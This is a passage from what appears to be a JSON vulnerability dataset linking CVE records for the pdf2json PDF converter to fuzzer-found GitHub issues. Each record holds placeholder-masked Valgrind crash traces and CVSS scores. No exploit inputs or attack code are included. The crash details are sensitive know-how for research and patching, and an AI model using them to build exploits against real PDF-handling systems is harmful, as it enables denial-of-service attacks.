NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51450. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51451. "severity": "MEDIUM",
  51452. "baseScore": 5.5,
  51453. "impactScore": 3.6,
  51454. "exploitabilityScore": 1.8
  51455. },
  51456. {
  51457. "CVE_ID": "CVE-2020-19471",
  51458. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/32",
  51459. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/32",
  51460. "Repo_new": "flexpaper/pdf2json",
  51461. "Issue_Created_At": "2019-05-28T23:23:25Z",
  51462. "description": "Aborted on APITAG Hi, Our fuzzer found a bug due to an invalid read on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Command token too long Error NUMBERTAG Missing 'endstream' Error NUMBERTAG Unknown DCT marker APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf1c is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG BC5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG in arena \"client NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b5bf2c is NUMBERTAG bytes after a block of size NUMBERTAG in arena \"client NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG feabb is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FEABB NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51463. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51464. "severity": "MEDIUM",
  51465. "baseScore": 5.5,
  51466. "impactScore": 3.6,
  51467. "exploitabilityScore": 1.8
  51468. },
  51469. {
  51470. "CVE_ID": "CVE-2020-19472",
  51471. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/33",
  51472. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/33",
  51473. "Repo_new": "flexpaper/pdf2json",
  51474. "Issue_Created_At": "2019-05-28T23:35:23Z",
  51475. "description": "Invalid read on APITAG Hi, Our fuzzer found a bug due to an invalid read on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Command token too long Error NUMBERTAG Command token too long Error NUMBERTAG Missing 'endstream NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG e2 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A1F: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG is NUMBERTAG bytes before a block of size NUMBERTAG in arena \"client NUMBERTAG Error NUMBERTAG Bad Huffman code in DCT stream Error NUMBERTAG Bad DCT header Error NUMBERTAG Unknown operator APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Thanks, Manh Dung",
  51476. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51477. "severity": "MEDIUM",
  51478. "baseScore": 5.5,
  51479. "impactScore": 3.6,
  51480. "exploitabilityScore": 1.8
  51481. },
  51482. {
  51483. "CVE_ID": "CVE-2020-19473",
  51484. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/34",
  51485. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/34",
  51486. "Repo_new": "flexpaper/pdf2json",
  51487. "Issue_Created_At": "2019-05-29T07:15:38Z",
  51488. "description": "Floating point exception on APITAG Hi, Our fuzzer found a bug due to a floating point exception on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Command token too long Error NUMBERTAG Illegal character '>' Error: PDF file is damaged attempting to reconstruct xref table... Error: End of file inside array Error: End of file inside dictionary Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Missing 'endstream' Error NUMBERTAG Bad DCT data: missing NUMBERTAG after ff Error NUMBERTAG Bad DCT header NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGFPE NUMBERTAG Integer divide by zero at address NUMBERTAG EBDD NUMBERTAG at NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG 